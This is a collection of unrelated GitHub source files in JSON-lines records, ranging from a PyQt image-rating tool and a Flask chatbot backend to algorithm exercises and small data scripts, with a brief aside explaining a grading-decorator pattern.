test_pep8,\n )\n","repo_name":"kdmalc/data-structs-algos","sub_path":"CS2204/CS_HW3/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
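A note on the validator record above: all of the grading metadata rides on two tiny decorators that simply attach attributes (__points__, __abort__) to test functions, which the runner later reads back with getattr defaults. The pattern in isolation:

def points(val):
    # Attach a score to a function without changing its behavior.
    def decorator(func):
        func.__points__ = val
        return func
    return decorator

@points(10)
def test_example():
    assert 1 + 1 == 2

print(getattr(test_example, "__points__", 0))  # -> 10; unscored functions give 0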
+{"seq_id":"74665788062","text":"import os\nimport time\nimport yaml\n\nimport numpy as np\nimport batoid\nimport danish\nfrom danish import DonutFactory\n\n\ndef time_image():\n obsc = yaml.safe_load(open(os.path.join(danish.datadir, 'RubinObsc.yaml')))\n factory = DonutFactory(\n obsc_radii=obsc['radii'],\n obsc_centers=obsc['centers'],\n obsc_th_mins=obsc['th_mins'],\n )\n\n telescope = batoid.Optic.fromYaml(\"LSST_r.yaml\")\n telescope = telescope.withGloballyShiftedOptic(\"Detector\", (0,0,0.0015))\n zref = batoid.zernikeTA(\n telescope, np.deg2rad(1.67), 0.0, 620e-9,\n jmax=66, nrad=20, naz=120, reference='chief', eps=0.61\n )\n\n N = 200\n np.random.seed(123)\n t0 = time.time()\n for _ in range(N):\n aberrations = np.array(zref)\n aberrations[4] += np.random.uniform(-0.1, 0.1)\n aberrations[5:23] += np.random.uniform(-0.1, 0.1, size=18)\n aberrations *= 620e-9\n img = factory.image(\n aberrations=aberrations, thx=np.deg2rad(1.67), thy=0.0\n )\n t1 = time.time()\n print(f\"Time for factory.image(): {(t1-t0)/N*1e3:.2f} ms\")\n\n\nif __name__ == \"__main__\":\n time_image()\n","repo_name":"jmeyers314/danish","sub_path":"devel/time_image.py","file_name":"time_image.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"37781861514","text":"#!/usr/bin/env python3\n'''\nProduce CSV files easily readable by Postgres' /copy\n'''\nimport gzip\nimport json\nimport tensorflow_hub as hub\nimport pandas as pd\nimport sys\nfrom tqdm import tqdm\nfrom nltk.tokenize import sent_tokenize\nimport tensorflow as tf\n\n\ndef load_abstracts(filename):\n with open(filename) as file:\n data = json.load(file)\n paper_ids = [key for key in data.keys()]\n abstracts = [data[key] for key in paper_ids]\n paper_ids = [int(paper_id) for paper_id in paper_ids]\n del data\n return paper_ids, abstracts\n\n\ndef embed_abstracts(abstracts, paper_ids, prefix):\n gpus = tf.config.experimental.list_physical_devices('GPU')\n if gpus:\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n print('Loading USE')\n embed = hub.load(\"https://tfhub.dev/google/universal-sentence-encoder-large/5\")\n\n def embed_abstract(abstract, paper_id):\n sentences = sent_tokenize(abstract)\n sentence_embeddings = embed(sentences).numpy()\n return str(paper_id) + '\\t' + '{' + ','.join([str(v) for v in sentence_embeddings.mean(axis=0)]) + '}\\n'\n\n def write_embeddings(embeddings, filename):\n print(f'writing to {filename}')\n with open(filename, 'w') as file:\n file.writelines(embeddings)\n\n print('Computing embeddings')\n embeddings = []\n suffix = 0\n for (paper_id, abstract) in tqdm(zip(paper_ids, abstracts)):\n if len(embeddings) >= 250000:\n write_embeddings(embeddings, f'{prefix}_{suffix}.tsv')\n suffix += 1\n embeddings = []\n embeddings.append(embed_abstract(abstract, paper_id))\n suffix += 1\n write_embeddings(embeddings, f'{prefix}_{suffix}.tsv')\n\n\ndef main():\n infilename = sys.argv[1]\n outfilename = sys.argv[2]\n print(f'Loading abstracts from {infilename}')\n paper_ids, abstracts = load_abstracts(infilename)\n embed_abstracts(abstracts, paper_ids, outfilename)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"APEX-WSU/mag_50k","sub_path":"scripts/python/abstract_use_embeddings_postgres.py","file_name":"abstract_use_embeddings_postgres.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"6228048624","text":"'''\r\nRaising an exception[raising exception means raising error description from our end when we get error]\r\n====================\r\n --------- python\r\n When there is fault in runtime---exception is raised--handles by--|\r\n by system --------try.excet(user defined)\r\n\r\nTill now exception is raised internally by system,\r\nif there is need to raised an exception,\r\nthen raise keyword to raise an exception.\r\n\r\nexception is raised with recepct to certain condition.\r\nSyntax to raise exception\r\n=========================\r\n\r\n raise ExceptionName('Message')\r\n\r\n'''\r\n\r\n\r\n\r\nx=int(input(\"enter numerator:\"))#x=9|x=9\r\ny=int(input(\"enter denominator:\"))#y=2|y=0\r\n\r\nif y==0: #2==0F|0==0T\r\n\r\n raise ZeroDivisionError('Denominator cannot be Zero!!')\r\n\r\n\r\nelse:\r\n d=x/y #9/2=>4.5 |9/0=> Exception is rasied|ZeroDivisionError\r\n print(\"Division is:\",d)\r\n\r\n'''\r\noutput:-\r\n\r\nenter numerator:9\r\nenter denominator:2\r\nDivision is: 4.5\r\n\r\n======== RESTART: C:/8.exception handling in python/raising_exception.py =======\r\nenter numerator:9\r\nenter denominator:0\r\nTraceback (most recent call last):\r\n File \"C:/8.exception handling in python/raising_exception.py\", line 27, in \r\n raise ZeroDivisionError('Denominator cannot be Zero!!')\r\nZeroDivisionError: Denominator cannot be Zero!!\r\n\r\n'''\r\n\r\n'''\r\nhome work:-\r\n\r\ncheck weither it is digit or not then if it is not digit then raise a exception for above code\r\n\r\n'''","repo_name":"CODERAJIT/Python-files","sub_path":"exception_handling in python/rasing_exception.py","file_name":"rasing_exception.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"19186464576","text":"from appium import webdriver\nfrom time import sleep\nfrom appium.webdriver.common.touch_action import TouchAction\n\ndesired_capabilities ={\n\"platformName\": \"Android\",\n\"platformVersion\": \"5.1.1\",\n\"deviceName\": \"62001\"\n}\n\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub',desired_capabilities=desired_capabilities)\nsleep(3)\n\n#定位元素\nmtxx = driver.find_element_by_accessibility_id(('美图秀秀'))\n#长按元素 可以一系列操作 执行\npressed = TouchAction(driver).long_press(mtxx).perform()\n#拖动并释放元素\npressed.move_to(x=125,y=84).release().perform()\n#点击确认\ndriver.tap([(591,732)])\nsleep((5))\n\n#用命令行工具实现\n#百度ANDRIOD KEYCODE\n#CMD:adb shell input keyevent KEYCODE_HOME\n#CMD:adb shell input keyevent 3","repo_name":"bai345767318/python-java","sub_path":"python/appium/demo08.py","file_name":"demo08.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35386725864","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nx = np.linspace(0, 5, 1000)\n\nf = 2\ny = np.sin(f * x * 2 * np.pi)\ny += 0.1 * np.sin(2 * f * x * 2 * np.pi)\ny += 0.4 * np.sin(3 * f * x * 2 * np.pi)\n\n\nif __name__ == \"__main__\":\n\n df = pd.DataFrame({\"x\": x, \"y\": y})\n df.to_csv(\"sinus.csv\", float_format='%.5f', index=False)\n\n plt.plot(x, y)\n plt.show()\n","repo_name":"MaxiHartmann/pyqt_learning","sub_path":"004_matplot_selection/data/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74998440221","text":"def search_quadruplets(arr,target):\n arr.sort()\n quadruplets = []\n\n for i in range(0,len(arr)-3):\n if i>0 and arr[i] == arr[i-1]:\n continue\n for j in range(i+1,len(arr)-2):\n if j > i+1 and arr[j] == arr[j-1]:\n continue\n search_pairs(arr,target,i,j,quadruplets)\n return quadruplets\n\ndef search_pairs(arr,target_sum, first, second, quadruplets):\n left = second + 1\n right = len(arr) - 1\n\n while (left < right):\n suma = arr[first] + arr[second] + arr[left] + arr[right]\n if suma == target_sum:\n quadruplets.append([arr[first],arr[second],arr[left],arr[right]])\n left += 1\n right -= 1\n while (left < right and arr[left]==arr[left-1]):\n left += 1\n while (left < right and arr[right]==arr[right+1]):\n right -= 1\n elif suma < target_sum:\n left += 1\n else:\n right -= 1\n\nprint(search_quadruplets([4,1,2,-1,1,-3],1)) #[[-3, -1, 1, 4], [-3, 1, 1, 2]]\nprint(search_quadruplets([4,1,2,-1,1,-3],1)) #[[-2, 0, 2, 2], [-1, 0, 1, 2]]\n ","repo_name":"alimalim77/Python-Practice-Track","sub_path":"Warm Up/four_sum.py","file_name":"four_sum.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72598515743","text":"#!env python3\n\nimport os\nimport sys\n# import pandas as pd\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nfrom PyQt5.QtGui import QIcon, QColor\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QWidget, QDialog, QMainWindow, QDesktopWidget\nsys.path.append(os.path.dirname(__file__)) \ntry:\n from . import mainwindow\nexcept (ImportError, SystemError):\n try: \n import mainwindow\n except ModuleNotFoundError:\n pass\n\nfrom collections import defaultdict\n\n\ndef find_files(dirname, match=None):\n result = []\n for root, dirs, files in os.walk(dirname):\n for file_ in files:\n if match is None or match in file_:\n result.append(file_)\n return result\n\n\nclass LensRater(QMainWindow, mainwindow.Ui_MainWindow):\n \"\"\" A hacked-together gui for rating lens images.\n TODO:\n Side-by-side for subtractions or single band images\n Expand image - zoom out\n Zoom in further\n Review choices made\n Produce output montages\n Access images remotely\n \"\"\"\n\n colour_codes = [Qt.black, QColor(27, 76, 198), QColor(234, 224, 23), QColor(198, 13, 13), Qt.gray]\n categories = [\"\", \"Maybe\", \"Probably\", \"Definitely\"]\n\n def __init__(self, image_dir):\n super(LensRater, self).__init__()\n self.setupUi(self)\n\n self.next_button.clicked.connect(self.nextImage)\n self.prev_button.clicked.connect(self.prevImage)\n\n self.image_dir = image_dir\n self.image_files = sorted(find_files(image_dir, match=\".png\"))\n if len(self.image_files) == 0:\n print(\"No image files found.\")\n sys.exit(0)\n self.image_index = 0\n self.current_image = None\n self.progress_bar.setMaximum(len(self.image_files))\n self.scorefile = self.image_dir + \"/scores.csv\"\n self.scores = defaultdict(lambda: -1)\n self.setChildrenFocusPolicy(QtCore.Qt.NoFocus)\n QtWidgets.qApp.installEventFilter(self)\n\n self.radios = [self.radio_0, self.radio_1, self.radio_2, self.radio_3]\n for i in range(4):\n self.radios[i].toggled.connect(self.radio_score)\n # self.radios[i].setFocusPolicy(QtCore.Qt.NoFocus)\n \n self.set_username_button.clicked.connect(self.update_username)\n self.username_edit.returnPressed.connect(self.set_username)\n self.jump_box.returnPressed.connect(self.jumped_to)\n self.actionSave_and_Quit.triggered.connect(self.close)\n self.actionQuit_without_saving.triggered.connect(self.quit)\n self.actionReset_scores.triggered.connect(self.reset)\n\n p = self.palette()\n p.setColor(self.backgroundRole(), Qt.white)\n self.setPalette(p)\n\n qtRectangle = self.frameGeometry()\n centerPoint = QDesktopWidget().availableGeometry().center()\n qtRectangle.moveCenter(centerPoint)\n self.move(qtRectangle.topLeft())\n\n self.set_label.setText(os.path.abspath(image_dir).split(\"/\")[-1])\n self.username = os.environ.get(\"USER\", \"nobody\")\n self.load()\n self.username_edit.setText(self.username)\n self.go_to_last()\n # self.goto_image(0)\n\n def set_colour_code(self, colour):\n p = self.colour_label.palette()\n p.setColor(self.backgroundRole(), colour)\n self.colour_label.setPalette(p)\n\n def setChildrenFocusPolicy(self, policy):\n def recursiveSetChildFocusPolicy(parentQWidget):\n for childQWidget in parentQWidget.findChildren(QWidget):\n if childQWidget == self.username_edit or childQWidget == self.jump_box:\n continue\n childQWidget.setFocusPolicy(policy)\n recursiveSetChildFocusPolicy(childQWidget)\n\n recursiveSetChildFocusPolicy(self)\n\n def eventFilter(self, source, event):\n if event.type() == QtCore.QEvent.KeyPress:\n if event.key() == QtCore.Qt.Key_Left or event.key(\n 
) == QtCore.Qt.Key_Right:\n self.keyPressEvent(event)\n return True\n return super(LensRater, self).eventFilter(source, event)\n\n def keyPressEvent(self, e):\n if e.key() == QtCore.Qt.Key_Escape:\n self.close()\n elif e.key() == QtCore.Qt.Key_Right or e.key() == QtCore.Qt.Key_J:\n self.nextImage()\n elif e.key() == QtCore.Qt.Key_Left or e.key() == QtCore.Qt.Key_K:\n self.prevImage()\n elif e.key() == QtCore.Qt.Key_End:\n self.goto_image(len(self.image_files) - 1)\n elif e.key() == QtCore.Qt.Key_Home:\n self.goto_image(0)\n elif e.key() == QtCore.Qt.Key_PageUp:\n self.goto_image(max(self.image_index - 10, 0))\n elif e.key() == QtCore.Qt.Key_PageDown:\n self.goto_image(\n min(self.image_index + 10, len(self.image_files) - 1))\n elif e.key() == QtCore.Qt.Key_Space:\n # self.up_score()\n self.nextImage()\n elif e.key() == QtCore.Qt.Key_0 or e.key() == QtCore.Qt.Key_QuoteLeft:\n self.score_image(0)\n elif e.key() == QtCore.Qt.Key_1:\n self.score_image(1)\n elif e.key() == QtCore.Qt.Key_2:\n self.score_image(2)\n elif e.key() == QtCore.Qt.Key_3:\n self.score_image(3)\n # elif e.key() == QtCore.Qt.Key_Right:\n # pass\n # elif e.key() == QtCore.Qt.Key_Right:\n # pass\n # elif e.key() == QtCore.Qt.Key_Right:\n # pass\n elif e.key() == QtCore.Qt.Key_Return:\n pass\n # self.close()\n\n def nextImage(self):\n if self.image_index < len(self.image_files) - 1:\n self.image_index += 1\n self.goto_image(self.image_index)\n\n def prevImage(self):\n if self.image_index > 0:\n self.image_index -= 1\n self.goto_image(self.image_index)\n\n def goto_image(self, index):\n self.image_index = index\n self.current_image = self.image_files[index]\n self.set_display_image(self.image_files[index])\n self.position_label.setText(str(index) +\": \" + self.current_image)\n self.progress_bar.setValue(index + 1)\n current_score = self.scores[self.current_image]\n self.set_colour_code(LensRater.colour_codes[current_score])\n self.toggle_radio(current_score)\n\n if current_score < 0: # Implicitly score when seen\n self.score_image(0)\n\n def toggle_radio(self, score):\n for i in range(4):\n self.radios[i].setChecked(i == score)\n\n def resizeEvent(self, event):\n self.goto_image(self.image_index)\n\n def set_display_image(self, impath):\n min_dim = min(self.image_label.width(), self.image_label.height())\n image_profile = QtGui.QImage(self.image_dir + \"/\" + impath)\n image_profile = image_profile.scaled(min_dim, min_dim, \\\n aspectRatioMode=QtCore.Qt.KeepAspectRatio, \\\n transformMode=QtCore.Qt.SmoothTransformation)\n # self.image_label.setScaledContents(True)\n self.image_label.setPixmap(QtGui.QPixmap.fromImage(image_profile))\n\n def up_score(self):\n current_score = self.scores[self.current_image]\n newscore = current_score + 1\n if newscore > 3:\n newscore = 0\n self.score_image(newscore)\n\n def go_to_last(self):\n for i, f in enumerate(self.image_files):\n if self.scores[f] < 0:\n self.goto_image(i)\n break\n \n def radio_score(self):\n for i in range(4):\n if self.radios[i].isChecked():\n self.score_image(i)\n break\n\n def score_image(self, score):\n self.scores[self.current_image] = score\n self.set_colour_code(LensRater.colour_codes[score])\n self.toggle_radio(score)\n self.colour_label.setText(LensRater.categories[score])\n\n def load(self):\n if os.path.isfile(self.scorefile):\n with open(self.scorefile, \"r\") as f:\n lines = [s.split(\",\") for s in f.readlines()]\n self.username = lines[1][0]\n for line in lines[1:]:\n self.scores[line[1]] = int(line[2])\n\n def jumped_to(self):\n # 
self.jump_box.setEnabled(False)\n self.setFocus()\n goto = self.jump_box.text()\n try:\n goto = int(goto)\n self.goto_image(goto)\n except ValueError:\n pass\n self.jump_box.setText(\"\")\n\n def update_username(self):\n self.username_edit.setEnabled(True)\n self.username_edit.setText(\"\")\n self.username_edit.setFocus()\n\n def set_username(self):\n self.set_username_(self.username_edit.text())\n self.username_edit.setEnabled(False)\n self.username_edit.setFocus()\n\n def set_username_(self, username):\n self.username = username\n\n def review_scores(self):\n pass\n\n def save(self):\n with open(self.scorefile, \"w\") as f:\n f.write(\"username,image,score\\n\")\n for file_ in self.image_files:\n f.write(\"%s,%s,%d\\n\" % (self.username, file_.split(\"/\")[-1],\\\n self.scores[file_]))\n\n def quit(self):\n sys.exit(0)\n\n def reset(self):\n for key in self.scores:\n self.scores[key] = -1\n\n def close(self):\n self.save()\n super(LensRater, self).close()\n\n\ndef main():\n app = QApplication(sys.argv)\n iconloc = \"/\".join(__file__.split(\"/\")[0:-1]) + '/icon.png'\n if not os.path.isfile(iconloc):\n iconloc = \"../icon.png\"\n if not os.path.isfile(iconloc):\n iconloc = \"/\".join(__file__.split(\"/\")[0:-1]) + \"/../icon.png\"\n app.setWindowIcon(QIcon(iconloc))\n imgdir = \".\"\n if len(sys.argv) > 1:\n imgdir = sys.argv[1]\n window = LensRater(imgdir)\n app.aboutToQuit.connect(window.save)\n window.show()\n sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"coljac/lensrater","sub_path":"lensrater/lensrater.py","file_name":"lensrater.py","file_ext":"py","file_size_in_byte":9947,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
+{"seq_id":"11358456981","text":"import unittest\n#\n# Design and implement an algorithm that can preprocess a\n# graph and then answer the question \"is x connected to y in the\n# graph\" for any x and y in constant time Theta(1).\n#\n\n#\n# `process_graph` will be called only once on each graph. If you want,\n# you can store whatever information you need for `is_connected` in\n# global variables\n#\ndef mark_component(G, node):\n marked = {}\n open_list = [node]\n while len(open_list) > 0:\n current_node = open_list.pop()\n marked[current_node] = True\n for neighbor in G[current_node]:\n if neighbor not in marked:\n open_list.append(neighbor)\n\n return marked\n\nmarked_dict = {}\ndef process_graph(G):\n for node in G.keys():\n marked = mark_component(G, node)\n marked_dict[node] = marked\n pass\n\n#\n# When being graded, `is_connected` will be called\n# many times so this routine needs to be quick\n#\ndef is_connected(i, j):\n return j in marked_dict[i]\n\n#######\n# Testing\n#\nclass test_preprocess(unittest.TestCase):\n def test(self):\n G = {'a':{'b':1},\n 'b':{'a':1},\n 'c':{'d':1},\n 'd':{'c':1},\n 'e':{}}\n process_graph(G)\n self.assertTrue(is_connected('a', 'b'))\n self.assertFalse(is_connected('a', 'c'))\n\n G = {'a':{'b':1, 'c':1},\n 'b':{'a':1},\n 'c':{'d':1, 'a':1},\n 'd':{'c':1},\n 'e':{}}\n process_graph(G)\n self.assertTrue(is_connected('a', 'b'))\n self.assertTrue(is_connected('a', 'c'))\n self.assertFalse(is_connected('a', 'e'))\n\n\n","repo_name":"gajo357/IntroToAlgorithms","sub_path":"Week7/PreprocessGraphModule.py","file_name":"PreprocessGraphModule.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"38415886448","text":"\"\"\"\n作者:萌新源\n时间:2022/3/30\n操作系统:debian for raspberry pi\n修改请保留本插件的版权\n本插件版权属于萌新源\n要发布请注明出处\n\n\"\"\"\nfrom nonebot import on_keyword\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.onebot.v11 import GroupMessageEvent,Bot,Message,MessageSegment,Event\nimport requests\nimport json\n\nxingzuo = on_keyword({'#星座'})\n\n@xingzuo.handle()\nasync def xz(bot: Bot, event: Event, state: T_State):\n anses = str(event.get_message()).strip()\n ansek = anses.strip('#星座')\n url = f'http://hm.suol.cc/API/xzys.php?msg={ansek}'\n x = requests.get(url)\n ansx = x.text\n b = '{br}'\n n = '\\n'\n# print(hua)\n if b in ansx:\n ansu = ansx.replace(b,n)\n await xingzuo.finish(Message(f'{ansu}'))\n else:\n await xingzuo.finish(Message(f'{ansx}'))\n \n \n\n","repo_name":"Akira-TL/my_bot1","sub_path":"src/plugins/Genshin_Constellation_Score/xzim.py","file_name":"xzim.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"42131596840","text":"from flask import request, render_template, flash, redirect, url_for, jsonify, Flask\nfrom flask import current_app as app\nfrom flask_sqlalchemy import SQLAlchemy # 데이터베이스\nfrom flask_migrate import Migrate\n\nimport os\nimport requests\nimport json\n\n# 모듈화 파일\n\n\n# 데이터 베이스\nfrom models import db, migrate, User, guestBook\n\n# 알림 기능\nfrom informationPart import m_corona\nfrom informationPart import m_movie\nfrom informationPart import m_musicChart\nfrom informationPart import m_welcome\nfrom informationPart import m_weather\n\n# 시스템\nfrom systemPart import myPage\nfrom systemPart import signUp\nfrom systemPart import signIn\nfrom systemPart import blockId\nfrom systemPart import inventory\nfrom systemPart import shop\nfrom systemPart import ranking\nfrom systemPart import get_kakaoKey\n\n# 게임\nfrom gamePart import gamePartInfo\nfrom gamePart import beefUp\nfrom gamePart import mine\nfrom gamePart import fishing\nfrom gamePart import sneeze\nfrom gamePart import hatching\nfrom gamePart import growing\nfrom gamePart import growing_eat\nfrom gamePart import growing_play\n\nfrom minzy import minzy\n\napp = Flask(__name__)\n\n# 데이터베이스 초기화\nBASE_DIR = os.path.dirname(__file__)\ndbfile = os.path.join(BASE_DIR, 'db.sqlite')\n\napp.config['SQLALCHEMY_DATABASE_URI']= 'sqlite:///'+dbfile\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SECRET_KEY'] = 'hijoker'\n\ndb.init_app(app)\nmigrate.init_app(app, db, render_as_batch=True)\ndb.app = app\ndb.create_all()\n\n@app.route('/', methods=['GET','POST']) # 인덱스 페이지\ndef index():\n if request.method == 'POST':\n if not request.form['writer'] or \\\n not request.form['text']:\n flash('입력하지 않은 내용이 있습니다', 'error')\n else:\n gb = guestBook(request.form['writer'], request.form['text'])\n db.session.add(gb)\n db.session.commit()\n flash('글이 성공적으로 작성되었습니다')\n return render_template('index.html', guestBooks = guestBook.query.all())\n\n@app.route('/welcome', methods=['POST']) # 웰컴블록\ndef call_welcome_skill():\n res = m_welcome.welcome()\n return jsonify(res)\n\n@app.route('/func_quick', methods=['POST']) # 기능부분 바로가기메뉴\ndef call_quickmenu():\n res = m_welcome.quick_menu()\n return jsonify(res)\n\n@app.route('/gamePartInfo', methods=['POST']) # 기능부분 바로가기메뉴\ndef call_gamePartInfo():\n res = gamePartInfo.gamePartInfo()\n return jsonify(res)\n\n@app.route('/weather', methods=['POST']) # 날씨 알림\ndef call_weather():\n res = m_weather.weather(request.get_json())\n return jsonify(res)\n\n@app.route('/musicChart',methods=['POST']) # 멜론차트 알림\ndef call_music():\n res = m_musicChart.musicChart()\n return jsonify(res)\n \n@app.route('/movies', methods=['POST']) # 영화 알림\ndef call_movie():\n res = m_movie.movie(request.get_json())\n return jsonify(res)\n\n@app.route('/corona', methods=['POST']) #코로나 알림\ndef call_corona():\n res = m_corona.corona()\n return jsonify(res)\n \n@app.route('/myPage', methods=['POST']) # 마이페이지\ndef call_myPage():\n res = myPage.myPage(request.get_json())\n return jsonify(res)\n\n@app.route('/makeNickname', methods=['POST']) # 닉네임 있는 유저인지 확인\ndef call_makeNickname():\n res = get_kakaoKey.makeNickname(request.get_json())\n return jsonify(res)\n \n@app.route('/signUp', methods=['POST']) # 회원가입\ndef call_signUp():\n res = signUp.signUp(request.get_json())\n return jsonify(res)\n\n@app.route('/signUp_yes', methods=['POST']) # 회원가입2\ndef call_signUp_yes():\n res = signUp.signUp_yes(request.get_json())\n return jsonify(res)\n \n@app.route('/signIn', 
methods=['POST']) # sign in\ndef call_signIn():\n res = signIn.signIn(request.get_json())\n return jsonify(res)\n\n@app.route('/attendance', methods=['POST']) # attendance check\ndef call_attendance():\n res = attendance.attendance(request.get_json())\n return jsonify(res)\n \n@app.route('/inventory', methods=['POST']) # show the user's inventory\ndef call_inventory():\n res = inventory.inventory(request.get_json())\n return jsonify(res)\n\n@app.route('/fish_inven', methods=['POST']) # show the fish inventory\ndef call_fish_inven():\n res = inventory.fish_inven(request.get_json())\n return jsonify(res)\n \n@app.route('/sellItem', methods=['POST']) # sell an item\ndef call_sellItem():\n res = inventory.sellItem(request.get_json())\n return jsonify(res)\n\n@app.route('/sellItem_yes', methods=['POST']) # confirm the item sale\ndef call_sellItem_yes():\n res = inventory.sellItem_yes(request.get_json())\n return jsonify(res)\n \n@app.route('/viewItemDescript', methods=['POST']) # view an item description\ndef call_viewItemDescript():\n res = inventory.viewItemDescript(request.get_json())\n return jsonify(res)\n \n@app.route('/itemLock', methods=['POST']) # lock an item\ndef call_itemLock():\n res = inventory.itemLock(request.get_json())\n return jsonify(res)\n \n@app.route('/buyAnEquipment', methods=['POST']) # when the buy button is clicked in the shop\ndef call_buyAnEquipment():\n res = shop.buyAnEquipment(request.get_json())\n return jsonify(res)\n \n@app.route('/shop', methods=['POST']) # shop\ndef call_shop():\n res = shop.shop()\n return jsonify(res)\n \n@app.route('/shop_equipment', methods=['POST']) # equipment shop\ndef call_shop_equipment():\n res = shop.shop_equipment()\n return jsonify(res)\n \n@app.route('/shop_pet', methods=['POST']) # pet shop\ndef call_shop_pet():\n res = shop.shop_pet()\n return jsonify(res)\n \n@app.route('/ranking', methods=['POST']) # ranking\ndef call_ranking():\n res = ranking.ranking(request.get_json())\n return jsonify(res)\n \n@app.route('/beefUp_select', methods=['POST']) # enhancement game: choose equipment\ndef call_beefUp_select():\n res = beefUp.beefUp_select(request.get_json())\n return jsonify(res)\n \n@app.route('/beefUp', methods=['POST']) # enhancement game\ndef call_beefUp():\n res = beefUp.beefUp(request.get_json())\n return jsonify(res)\n \n@app.route('/beefUp_try', methods=['POST']) # enhancement game result\ndef call_beefUp_try():\n res = beefUp.beefUp_try(request.get_json())\n return jsonify(res)\n\n@app.route('/mine', methods=['POST']) # mining\ndef call_mine():\n res = mine.mine(request.get_json())\n return jsonify(res)\n \n@app.route('/fishing', methods=['POST']) # fishing\ndef call_fishing():\n res = fishing.fishing(request.get_json())\n return jsonify(res)\n \n@app.route('/hatching', methods=['POST']) # incubator\ndef call_hatching():\n res = hatching.hatching(request.get_json())\n return jsonify(res)\n \n@app.route('/growing', methods=['POST']) # training center\ndef call_growing():\n res = growing.growing(request.get_json())\n return jsonify(res)\n \n@app.route('/growing_eat', methods=['POST']) # training center: feeding\ndef call_growing_eat():\n res = growing_eat.growing_eat(request.get_json())\n return jsonify(res)\n \n@app.route('/growing_play', methods=['POST']) # training center: playing\ndef call_growing_play():\n res = growing_play.growing_play(request.get_json())\n return jsonify(res)\n \n@app.route('/sneeze_index', methods=['POST']) # sneeze game index\ndef call_sneeze_index():\n res = sneeze.sneeze_index(request.get_json())\n return jsonify(res)\n \n@app.route('/sneeze_onclick', methods=['POST']) # sneeze game click handler\ndef call_sneeze_onclick():\n res = sneeze.sneeze_onclick(request.get_json())\n return jsonify(res)\n \n@app.route('/blockId', methods=['POST']) # for checking block IDs\ndef call_blockId():\n res = blockId.blockId(request.get_json())\n return jsonify(res)\n \n\nif __name__ ==\"__main__\":\n app.run(debug=True,host=\"0.0.0.0\", port=1234)\n\n\n \n \n\n","repo_name":"kuyang95/1319_KakaoChatBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"41722991366","text":"# NAME:\n# FILENAME:\n# SUMMARY:\n\nimport pygame\n\n\nclass Texture:\n def __init__(self, img_path, dim):\n \"\"\"\n A (perhaps overkill?) class for storing/computing/running textures in pygame\n As-is, this only repeats a SINGLE texture\n :param img_path: path to image for texture\n :param dim: width of the base image within the texture\n \"\"\"\n self.image = pygame.image.load(img_path)\n self.dim = dim # dimension of each square of the texture (e.g., 28x28, so a big image would have several)\n self.image = pygame.transform.scale(self.image, (self.dim, self.dim))\n self.image.set_alpha(85)\n\n def tiled(self, max_width, max_height):\n tiled_surf = pygame.Surface((max_width, max_height))\n for x in range(0, max_width + 1, self.dim):\n for y in range(0, max_height + 1, self.dim):\n tiled_surf.blit(self.image, (x, y)) # these makes a 1 surface made of several tiles of self.image\n return tiled_surf\n","repo_name":"Sown-Dev/CMPT330","sub_path":"HW5/textures.py","file_name":"textures.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"71563551264","text":"from Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.Align import PairwiseAligner\nfrom tqdm import tqdm\n\nnon_amb_nucs = [\"A\",\"G\",\"C\",\"T\"]\n\nreference = next(SeqIO.parse(open(snakemake.input[0],\"r\"),\"fasta\")).seq\nsequences = list(SeqIO.parse(open(snakemake.input[1],\"r\"),\"fasta\"))\n\naligner = PairwiseAligner()\naligner.mode = \"global\"\naligner.match_score = 1\naligner.mismatch_score = -2\naligner.gap_score = -2\n\nsequence_output = []\n\nfor seq_ref in tqdm(sequences):\n\tseq = seq_ref.seq\n\tseq_str = str(seq_ref.seq).upper()\n\n\tnot_good = False\n\tfor nuc in seq_str:\n\t\tif nuc not in non_amb_nucs:\n\t\t\tnot_good = True\n\t\t\tbreak\n\tif not_good:\n\t\tcontinue\n\n\tseq_ref.seq = Seq(seq_str)\n\n\tif len(seq) != len(reference):\n\t\tcontinue\n\talignment = aligner.align(reference, seq)[0]\n\n\tif \"-\" in alignment.target or \"-\" in 